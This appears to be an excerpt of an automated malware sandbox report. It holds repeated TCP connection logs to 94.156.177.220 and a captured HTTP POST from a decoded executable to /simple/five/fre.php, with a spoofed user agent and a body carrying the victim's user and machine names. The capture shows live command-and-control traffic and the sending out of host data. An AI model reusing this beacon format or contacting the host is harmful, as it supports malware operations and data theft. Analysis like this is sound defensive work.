Oct 25, 2024 10:21:32.212069988 CEST	49985	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:32.338514090 CEST	49991	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:32.344103098 CEST	80	49991	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:32.344361067 CEST	49991	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:32.346360922 CEST	49991	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:32.352161884 CEST	80	49991	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:32.352236032 CEST	49991	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:32.357851982 CEST	80	49991	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:33.334688902 CEST	80	49991	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:33.334820986 CEST	49991	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:33.340435982 CEST	80	49991	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:33.342763901 CEST	49991	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:33.481662989 CEST	49998	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:33.487065077 CEST	80	49998	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:33.487175941 CEST	49998	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:33.489151001 CEST	49998	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:33.496249914 CEST	80	49998	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:33.496323109 CEST	49998	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:33.501665115 CEST	80	49998	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:34.472930908 CEST	80	49998	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:34.473110914 CEST	49998	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:34.478912115 CEST	80	49998	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:34.480921984 CEST	49998	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:34.635317087 CEST	50005	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:34.641180992 CEST	80	50005	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:34.641263008 CEST	50005	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:34.644509077 CEST	50005	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:34.650415897 CEST	80	50005	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:34.650471926 CEST	50005	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:34.656075001 CEST	80	50005	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:35.623763084 CEST	80	50005	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:35.623881102 CEST	50005	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:35.629820108 CEST	80	50005	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:35.629884958 CEST	50005	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:35.768284082 CEST	50014	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:35.773655891 CEST	80	50014	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:35.773786068 CEST	50014	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:35.776802063 CEST	50014	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:35.782202959 CEST	80	50014	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:35.782291889 CEST	50014	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:35.787607908 CEST	80	50014	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:36.765660048 CEST	80	50014	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:36.765799999 CEST	50014	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:36.772728920 CEST	80	50014	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:36.772818089 CEST	50014	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:36.907793999 CEST	50021	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:36.913394928 CEST	80	50021	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:36.913476944 CEST	50021	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:36.916836023 CEST	50021	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:36.922523022 CEST	80	50021	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:36.922599077 CEST	50021	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:36.928329945 CEST	80	50021	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:37.889924049 CEST	80	50021	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:37.890034914 CEST	50021	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:37.895859957 CEST	80	50021	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:37.895946026 CEST	50021	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:38.055980921 CEST	50027	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:38.062417984 CEST	80	50027	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:38.062511921 CEST	50027	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:38.065571070 CEST	50027	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:38.071510077 CEST	80	50027	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:38.071599007 CEST	50027	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:38.077544928 CEST	80	50027	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:39.040096045 CEST	80	50027	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:39.040400028 CEST	50027	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:39.046534061 CEST	80	50027	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:39.046617031 CEST	50027	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:39.191823959 CEST	50033	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:39.197257042 CEST	80	50033	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:39.197359085 CEST	50033	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:39.199455023 CEST	50033	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:39.204767942 CEST	80	50033	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:39.204843044 CEST	50033	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:39.210155010 CEST	80	50033	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:40.344208956 CEST	80	50033	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:40.344341040 CEST	50033	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:40.350403070 CEST	80	50033	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:40.350474119 CEST	50033	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:40.485609055 CEST	50039	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:40.491167068 CEST	80	50039	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:40.491261959 CEST	50039	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:40.493951082 CEST	50039	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:40.499747038 CEST	80	50039	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:40.499809980 CEST	50039	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:40.505490065 CEST	80	50039	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:41.490698099 CEST	80	50039	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:41.490818024 CEST	50039	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:41.496560097 CEST	80	50039	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:41.496651888 CEST	50039	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:41.638991117 CEST	50050	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:41.646015882 CEST	80	50050	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:41.646161079 CEST	50050	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:41.648252010 CEST	50050	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:41.653844118 CEST	80	50050	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:41.653913975 CEST	50050	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:41.659487963 CEST	80	50050	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:42.628232956 CEST	80	50050	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:42.628355980 CEST	50050	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:42.635639906 CEST	80	50050	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:42.635705948 CEST	50050	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:42.761641026 CEST	50056	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:42.767433882 CEST	80	50056	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:42.767553091 CEST	50056	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:42.769633055 CEST	50056	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:42.775172949 CEST	80	50056	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:42.775265932 CEST	50056	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:42.780829906 CEST	80	50056	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:43.771524906 CEST	80	50056	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:43.771661043 CEST	50056	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:43.777736902 CEST	80	50056	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:43.777789116 CEST	50056	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:43.924614906 CEST	50062	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:43.929955959 CEST	80	50062	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:43.930028915 CEST	50062	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:43.932138920 CEST	50062	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:43.937606096 CEST	80	50062	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:43.937768936 CEST	50062	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:43.943192959 CEST	80	50062	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:44.921889067 CEST	80	50062	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:44.922013998 CEST	50062	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:44.927928925 CEST	80	50062	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:44.928004026 CEST	50062	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:45.063291073 CEST	50073	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:45.069022894 CEST	80	50073	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:45.069242954 CEST	50073	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:45.071362972 CEST	50073	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:45.077105045 CEST	80	50073	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:45.077227116 CEST	50073	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:45.082832098 CEST	80	50073	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:46.047409058 CEST	80	50073	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:46.047554970 CEST	50073	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:46.053961039 CEST	80	50073	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:46.054039001 CEST	50073	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:46.188684940 CEST	50078	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:46.194499969 CEST	80	50078	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:46.194623947 CEST	50078	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:46.196688890 CEST	50078	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:46.202194929 CEST	80	50078	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:46.202322960 CEST	50078	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:46.207716942 CEST	80	50078	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:47.209161997 CEST	80	50078	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:47.209475040 CEST	50078	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:47.216254950 CEST	80	50078	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:47.216434956 CEST	50078	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:47.363806963 CEST	50085	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:47.369515896 CEST	80	50085	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:47.369745970 CEST	50085	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:47.371918917 CEST	50085	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:47.377293110 CEST	80	50085	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:47.377458096 CEST	50085	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:47.382850885 CEST	80	50085	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:48.343065023 CEST	80	50085	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:48.343221903 CEST	50085	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:48.349011898 CEST	80	50085	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:48.349071980 CEST	50085	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:48.488389015 CEST	50088	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:48.493879080 CEST	80	50088	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:48.493952036 CEST	50088	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:48.496957064 CEST	50088	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:48.502445936 CEST	80	50088	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:48.502507925 CEST	50088	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:48.508037090 CEST	80	50088	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:49.488792896 CEST	80	50088	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:49.489043951 CEST	50088	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:49.494903088 CEST	80	50088	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:49.494980097 CEST	50088	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:49.645447016 CEST	50089	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:49.651030064 CEST	80	50089	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:49.651113987 CEST	50089	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:49.654278040 CEST	50089	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:49.659766912 CEST	80	50089	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:49.659828901 CEST	50089	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:49.665236950 CEST	80	50089	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:50.626844883 CEST	80	50089	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:50.627196074 CEST	50089	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:50.633330107 CEST	80	50089	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:50.633413076 CEST	50089	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:51.365036964 CEST	50090	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:51.370995998 CEST	80	50090	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:51.371249914 CEST	50090	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:51.492516994 CEST	50090	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:51.498225927 CEST	80	50090	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:51.498323917 CEST	50090	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:51.503798962 CEST	80	50090	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:52.356110096 CEST	80	50090	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:52.356229067 CEST	50090	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:52.362706900 CEST	80	50090	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:52.362771034 CEST	50090	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:52.503968954 CEST	50091	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:52.509531021 CEST	80	50091	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:52.509637117 CEST	50091	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:52.512600899 CEST	50091	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:52.518146038 CEST	80	50091	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:52.518212080 CEST	50091	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:52.523916960 CEST	80	50091	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:53.474535942 CEST	80	50091	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:53.474653006 CEST	50091	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:53.481146097 CEST	80	50091	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:53.481208086 CEST	50091	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:53.635937929 CEST	50092	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:53.641496897 CEST	80	50092	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:53.641597033 CEST	50092	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:53.643651009 CEST	50092	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:53.649079084 CEST	80	50092	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:53.649173021 CEST	50092	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:53.654597998 CEST	80	50092	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:54.627542973 CEST	80	50092	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:54.628216028 CEST	50092	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:54.634279966 CEST	80	50092	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:54.634483099 CEST	50092	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:54.795806885 CEST	50093	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:54.801275015 CEST	80	50093	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:54.801362991 CEST	50093	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:54.804053068 CEST	50093	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:54.809382915 CEST	80	50093	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:54.809439898 CEST	50093	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:54.814842939 CEST	80	50093	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:55.754867077 CEST	80	50093	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:55.755063057 CEST	50093	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:55.761442900 CEST	80	50093	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:55.761511087 CEST	50093	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:55.909813881 CEST	50094	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:55.915513039 CEST	80	50094	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:55.915657043 CEST	50094	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:55.918642998 CEST	50094	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:55.924674988 CEST	80	50094	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:55.924734116 CEST	50094	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:55.930183887 CEST	80	50094	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:56.895411015 CEST	80	50094	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:56.895577908 CEST	50094	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:56.901726007 CEST	80	50094	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:56.901824951 CEST	50094	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:57.159589052 CEST	50095	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:57.165127993 CEST	80	50095	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:57.165231943 CEST	50095	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:57.167407990 CEST	50095	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:57.172780037 CEST	80	50095	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:57.172837019 CEST	50095	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:57.178184986 CEST	80	50095	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:58.166055918 CEST	80	50095	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:58.166255951 CEST	50095	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:58.172981024 CEST	80	50095	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:58.173064947 CEST	50095	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:58.323759079 CEST	50096	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:58.330338955 CEST	80	50096	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:58.330440998 CEST	50096	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:58.333457947 CEST	50096	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:58.338972092 CEST	80	50096	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:58.339191914 CEST	50096	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:58.344657898 CEST	80	50096	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:59.355499983 CEST	80	50096	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:59.355700970 CEST	50096	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:59.361506939 CEST	80	50096	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:59.361584902 CEST	50096	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:59.513612986 CEST	50097	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:59.519726992 CEST	80	50097	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:59.519845009 CEST	50097	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:59.521910906 CEST	50097	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:59.527431965 CEST	80	50097	94.156.177.220	192.168.2.4
Oct 25, 2024 10:21:59.527534962 CEST	50097	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:21:59.532994032 CEST	80	50097	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:00.528371096 CEST	80	50097	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:00.539506912 CEST	50097	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:00.545384884 CEST	80	50097	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:00.545455933 CEST	50097	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:01.004046917 CEST	50098	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:01.009598017 CEST	80	50098	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:01.009689093 CEST	50098	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:01.011735916 CEST	50098	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:01.017510891 CEST	80	50098	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:01.017570972 CEST	50098	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:01.023061037 CEST	80	50098	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:02.033549070 CEST	80	50098	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:02.033726931 CEST	50098	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:02.039544106 CEST	80	50098	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:02.039632082 CEST	50098	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:02.170727968 CEST	50099	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:02.176131964 CEST	80	50099	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:02.176211119 CEST	50099	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:02.178251028 CEST	50099	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:02.183757067 CEST	80	50099	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:02.183819056 CEST	50099	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:02.189198971 CEST	80	50099	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:03.140045881 CEST	80	50099	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:03.140266895 CEST	50099	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:03.146388054 CEST	80	50099	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:03.146495104 CEST	50099	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:04.432774067 CEST	50100	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:04.438590050 CEST	80	50100	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:04.438688040 CEST	50100	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:04.440668106 CEST	50100	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:04.446038961 CEST	80	50100	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:04.446101904 CEST	50100	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:04.451592922 CEST	80	50100	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:05.409997940 CEST	80	50100	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:05.410347939 CEST	50100	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:05.416568041 CEST	80	50100	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:05.416662931 CEST	50100	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:05.562225103 CEST	50101	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:05.568342924 CEST	80	50101	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:05.568434954 CEST	50101	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:05.570533037 CEST	50101	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:05.575944901 CEST	80	50101	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:05.576112032 CEST	50101	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:05.581444025 CEST	80	50101	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:06.540014029 CEST	80	50101	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:06.540301085 CEST	50101	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:06.546216965 CEST	80	50101	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:06.546328068 CEST	50101	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:06.693769932 CEST	50102	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:06.699457884 CEST	80	50102	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:06.699670076 CEST	50102	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:06.704200983 CEST	50102	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:06.709630013 CEST	80	50102	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:06.709690094 CEST	50102	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:06.715267897 CEST	80	50102	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:07.661010981 CEST	80	50102	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:07.717612028 CEST	50102	80	192.168.2.4	94.156.177.220
Oct 25, 2024 10:22:07.827410936 CEST	80	50102	94.156.177.220	192.168.2.4
Oct 25, 2024 10:22:07.827462912 CEST	50102	80	192.168.2.4	94.156.177.220

HTTP Request Dependency Graph

94.156.177.220

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:01.417874098 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 176 Connection: close
Oct 25, 2024 10:20:01.424021959 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones965543JONES-PCk0FDD42EE188E931437F4FBE2CF22Dz
